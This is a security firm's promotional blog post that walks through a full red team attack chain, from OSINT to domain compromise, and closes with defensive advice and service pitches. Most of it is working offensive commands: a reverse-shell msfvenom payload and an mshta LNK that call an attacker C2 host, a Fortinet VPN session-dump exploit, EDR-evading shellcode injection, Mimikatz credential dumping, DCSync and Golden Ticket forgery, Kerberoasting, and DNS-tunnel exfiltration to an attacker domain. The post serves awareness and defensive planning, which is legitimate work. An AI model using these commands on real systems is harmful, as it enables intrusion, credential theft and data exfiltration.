Most organizations focus on patching individual vulnerabilities. Attackers do not. Sophisticated threat actors chain together a sequence of low-to-medium severity weaknesses, each one unlocking the next, until they own your environment. This is the core philosophy behind red team operations, and understanding how these attack chains work is the first step toward defending against them.
This blog breaks down real-world red team attack chains with actual commands, techniques, and tradecraft used by professional operators. If you want to understand how attackers think, what tools they use, and how they string together seemingly unrelated vulnerabilities into a full breach, read carefully.
If your organization needs a professional red team assessment to test these exact attack paths, Redfox Cybersecurity's penetration testing services are designed to simulate real adversary behavior from initial access through full domain compromise.
A red team attack chain is a sequence of tactics, techniques, and procedures (TTPs) that mirror how a real-world threat actor would compromise a target. Unlike a standard vulnerability scan or even a traditional penetration test, a red team engagement strings together multiple attack stages: reconnaissance, initial access, privilege escalation, lateral movement, persistence, and data exfiltration.
Each stage feeds the next. A misconfigured S3 bucket leaks credentials. Those credentials give access to a VPN. The VPN connects to an internal host running an outdated service. That service gives a foothold into Active Directory. Active Directory gives everything.
This is the reality of modern breaches, and it is exactly what red teams simulate.
Before a single packet is sent to the target, red team operators spend hours building an intelligence picture. This involves aggregating data from public sources to map out employees, technologies, subdomains, and exposed services.
Subdomain Enumeration with Subfinder and HTTPX:
subfinder -d targetcorp.com -silent | httpx -status-code -title -tech-detect -o recon_output.txt
[cta]
This command discovers live subdomains, identifies what technologies are running on each, and records HTTP status codes. A forgotten dev subdomain running an outdated CMS is often the entry point.
Email Harvesting with theHarvester:
theHarvester -d targetcorp.com -b google,linkedin,hunter -f emails_output
[cta]
Harvested emails are used to craft spearphishing campaigns, test for credential stuffing, or build a target list for password spray attacks against cloud identity providers.
Certificate Transparency Log Mining:
curl -s "https://crt.sh/?q=%25.targetcorp.com&output=json" | jq '.[].name_value' | sed 's/\\n/\n/g' | sort -u
[cta]
Certificate transparency logs expose subdomains that DNS enumeration misses, including staging environments and internal-facing apps that were accidentally made public.
This level of passive reconnaissance is what separates a real adversary from a script kiddie. Redfox Cybersecurity's red team engagements begin with the same depth of OSINT to ensure no attack surface is left unexplored.
After reconnaissance, the most common initial access vector is phishing. Not generic phishing, but contextually relevant, targeted phishing built from the OSINT gathered in Stage 1.
Generating a Macro-Embedded Document with msfvenom:
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=attacker.c2.com LPORT=443 -f vba > payload.vba
[cta]
The VBA macro is embedded into a Word document themed around an HR policy update, invoice, or IT security alert, depending on what the OSINT revealed about the target organization's culture and current events.
Bypassing Mark-of-the-Web with ISO Containers:
Modern red teams rarely send .exe files directly. Instead, operators package payloads inside .iso or .img files, which historically did not inherit MOTW (Mark-of-the-Web) protections, allowing embedded shortcuts (.lnk) to execute code without triggering SmartScreen.
# Create an LNK that calls a remote payload via living-off-the-land binary
$shell = New-Object -ComObject WScript.Shell
$lnk = $shell.CreateShortcut("C:\Temp\Invoice.lnk")
$lnk.TargetPath = "C:\Windows\System32\mshta.exe"
$lnk.Arguments = "http://attacker.c2.com/payload.hta"
$lnk.Save()
[cta]
When phishing is not part of the engagement scope, red teams pivot to exploiting internet-facing services.
Scanning for ProxyShell or Exchange Vulnerabilities with Nuclei:
nuclei -u https://mail.targetcorp.com -t cves/ -severity critical,high -o exchange_vulns.txt
[cta]
Exploiting a Vulnerable VPN Appliance:
Many organizations still run Fortinet, Pulse Secure, or Citrix appliances with known CVEs. Operators identify firmware versions through banner grabbing and then apply targeted exploits to obtain pre-authentication remote code execution or credential disclosure.
# Checking Fortinet SSL-VPN path traversal (CVE-2018-13379)
curl -sk "https://vpn.targetcorp.com/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession" -o session_dump.bin
strings session_dump.bin | grep -E "([a-zA-Z0-9_.-]+@[a-zA-Z0-9_.-]+)"
[cta]
A successful hit here yields plaintext or weakly encoded credentials for active VPN sessions, providing instant authenticated access to the internal network.
Once initial access is achieved, the implant phones home to a command and control (C2) infrastructure. Modern red teams use frameworks like Cobalt Strike, Havoc, or Sliver, with custom malleable profiles to blend traffic into normal-looking HTTPS or DNS.
Deploying a Sliver Implant with HTTPS C2:
sliver > generate --mtls attacker.c2.com --os windows --arch amd64 --format exe --save /tmp/implant.exe
sliver > mtls --lport 8888
[cta]
Injecting into a Trusted Process to Evade EDR:
Rather than running the implant as a standalone process, operators inject shellcode into a trusted Windows process to evade endpoint detection.
# Process injection into explorer.exe using WriteProcessMemory + CreateRemoteThread
$proc = Get-Process explorer | Select-Object -First 1
$handle = [Kernel32]::OpenProcess(0x1F0FFF, $false, $proc.Id)
$addr = [Kernel32]::VirtualAllocEx($handle, [IntPtr]::Zero, $shellcode.Length, 0x3000, 0x40)
[Kernel32]::WriteProcessMemory($handle, $addr, $shellcode, $shellcode.Length, [ref]0)
[Kernel32]::CreateRemoteThread($handle, [IntPtr]::Zero, 0, $addr, [IntPtr]::Zero, 0, [IntPtr]::Zero)
[cta]
This technique causes the malicious code to execute from within a process that security tools inherently trust, making behavioral detection significantly harder.
A low-privilege user account is not particularly useful. Red team operators immediately begin hunting for privilege escalation paths.
Automated Local Privilege Escalation Enumeration with WinPEAS:
.\winPEASx64.exe quiet systeminfo userinfo | Tee-Object -FilePath winpeas_output.txt
[cta]
Exploiting Unquoted Service Paths:
# Find services with unquoted paths and write permissions
Get-WmiObject Win32_Service | Where-Object { $_.PathName -notmatch '^"' -and $_.PathName -match ' ' } | Select-Object Name, PathName, StartMode
[cta]
If an attacker can write to any directory in the unquoted path, they place a malicious binary there. When the service restarts, Windows executes the attacker's binary as SYSTEM.
Token Impersonation with PrintSpoofer:
.\PrintSpoofer64.exe -i -c "cmd /c whoami > C:\Temp\privesc_proof.txt"
[cta]
On systems where the service account holds SeImpersonatePrivilege, this technique trivially escalates to SYSTEM without exploiting any CVE.
Professional red teams do not stop at SYSTEM on a single host. That is just the beginning. Redfox Cybersecurity maps the full escalation path from initial foothold through domain compromise in every engagement.
With SYSTEM-level access on one host, operators begin harvesting credentials and moving laterally to high-value targets.
Dumping Credentials with Mimikatz:
# Dump LSASS in-memory credentials
.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
[cta]
Even with Credential Guard enabled, operators extract Kerberos tickets for Pass-the-Ticket attacks.
Kerberoasting to Crack Service Account Passwords Offline:
# Request TGS tickets for all SPNs using Rubeus
.\Rubeus.exe kerberoast /outfile:kerberoast_hashes.txt /format:hashcat
# Crack offline with Hashcat
hashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt --force
[cta]
Weak passwords on service accounts are extremely common and trivially cracked offline, giving attackers authenticated access to whatever that service account can reach.
Once an account with Replication privileges is obtained, the entire domain is compromised in minutes.
# DCSync to dump all domain hashes without touching the DC directly
.\mimikatz.exe "lsadump::dcsync /domain:targetcorp.local /all /csv" "exit"
[cta]
This single command dumps every password hash in Active Directory, including the KRBTGT account, which enables Golden Ticket attacks that persist for years even after password resets.
Golden Ticket Generation for Persistent Domain Access:
.\mimikatz.exe "kerberos::golden /domain:targetcorp.local /sid:S-1-5-21-XXXXXXXXX /krbtgt:HASH /user:FakeAdmin /ptt" "exit"
[cta]
A Golden Ticket forged from the KRBTGT hash gives the attacker a valid Kerberos ticket for any account in the domain, valid for 10 years by default, surviving password changes unless the KRBTGT account is reset twice in quick succession.
Exfiltrating Data Through DNS Tunneling to Evade DLP:
# Encode sensitive data in DNS queries to bypass DLP solutions
cat sensitive_data.txt | base64 | while read line; do dig ${line}.exfil.attacker.com; done
[cta]
DNS exfiltration bypasses most data loss prevention tools because DNS traffic is rarely inspected at the content level.
The most important takeaway from this walkthrough is not any single exploit or technique. It is the chaining. Each individual step might be rated medium or even low severity in isolation. An unquoted service path means little without initial access. Kerberoastable accounts mean nothing if you cannot reach the network.
But chain them together, and a forgotten dev subdomain running outdated software becomes total domain compromise in under 48 hours.
This is why point-in-time vulnerability scanning is insufficient. Your organization needs adversary simulation that tests these exact multi-stage kill chains, not just individual CVEs.
Redfox Cybersecurity's penetration testing and red team services simulate exactly this type of chained attack across your entire environment, from perimeter to Active Directory, cloud, and beyond.
Understanding red team techniques directly informs defensive priorities. Here are the highest-leverage controls based on the attack chain above.
Segment Your Network Aggressively. Lateral movement depends on reaching internal targets after initial access. Micro-segmentation and strict firewall rules between workstation subnets, server networks, and domain controllers dramatically increase attacker dwell time and noise.
Audit and Harden Active Directory Continuously. Run BloodHound against your own environment regularly to discover attack paths before adversaries do.
.\SharpHound.exe -c All --outputdirectory C:\Temp\BloodHound
[cta]
Import the results into BloodHound and search for shortest paths to Domain Admins. Every path you sever is one a red team cannot walk.
Implement Privileged Access Workstations (PAWs). Domain admins should only authenticate from hardened, isolated workstations. This breaks the credential harvesting step that enables lateral movement.
Enable Credential Guard and LSA Protection. This prevents Mimikatz-style LSASS credential dumping on modern Windows systems.
Monitor for DCSync from Non-Domain Controllers. DCSync from a workstation should trigger an immediate high-severity alert. It never happens in legitimate operations.
Test Your Controls Regularly. Defensive controls that have never been tested under adversary simulation conditions often fail silently. Book a red team engagement with Redfox Cybersecurity to validate your detection and response capabilities against a real attack chain.
The red team attack chain documented in this blog, from passive OSINT through Golden Ticket persistence, is not theoretical. Variants of this exact kill chain are used in real-world breaches every week. The techniques are documented in the MITRE ATT&CK framework. The tools are openly available. The only question is whether your organization has tested its defenses against them.
Assuming you are not a target is a strategic error. Assuming your existing controls work without testing them is an operational error. The only rational approach is to bring in professional adversaries to find the gaps before real attackers do.
Redfox Cybersecurity specializes in realistic, intelligence-driven red team operations and penetration testing engagements that map directly to the ATT&CK framework. From external perimeter testing to full assumed-breach red team exercises, every engagement produces an actionable report tied to business risk, not just a list of CVEs.
Explore Redfox Cybersecurity's penetration testing and red team services at https://redfoxsec.com/services and find out how your organization holds up against a real attack chain.
Redfox Cyber Security Inc.
8 The Green, Ste. A, Dover,
Delaware 19901,
United States.
.avif)
